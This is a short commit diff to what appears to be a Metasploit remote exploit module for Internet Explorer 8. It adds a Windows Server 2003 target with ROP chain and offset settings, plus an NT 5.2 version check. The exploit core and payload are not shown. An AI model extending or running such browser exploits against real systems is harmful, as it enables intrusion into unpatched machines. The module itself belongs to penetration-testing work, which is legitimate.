Added Windows Server 2003
parent
6cb9106218
commit
14d197eeb2
|
@ -58,6 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
[ 'Automatic', {} ],
|
[ 'Automatic', {} ],
|
||||||
[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30
|
[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30
|
||||||
[ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30
|
[ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30
|
||||||
|
[ 'IE 8 on Windows Server 2003', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30
|
||||||
[ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30
|
[ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30
|
||||||
],
|
],
|
||||||
'Privileged' => false,
|
'Privileged' => false,
|
||||||
|
@ -83,6 +84,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
case nt
|
case nt
|
||||||
when '5.1'
|
when '5.1'
|
||||||
os_name = 'Windows XP SP3'
|
os_name = 'Windows XP SP3'
|
||||||
|
when '5.2'
|
||||||
|
os_name = 'Windows Server 2003'
|
||||||
when '6.0'
|
when '6.0'
|
||||||
os_name = 'Windows Vista'
|
os_name = 'Windows Vista'
|
||||||
when '6.1'
|
when '6.1'
|
||||||
|
|
Loading…
Reference in New Issue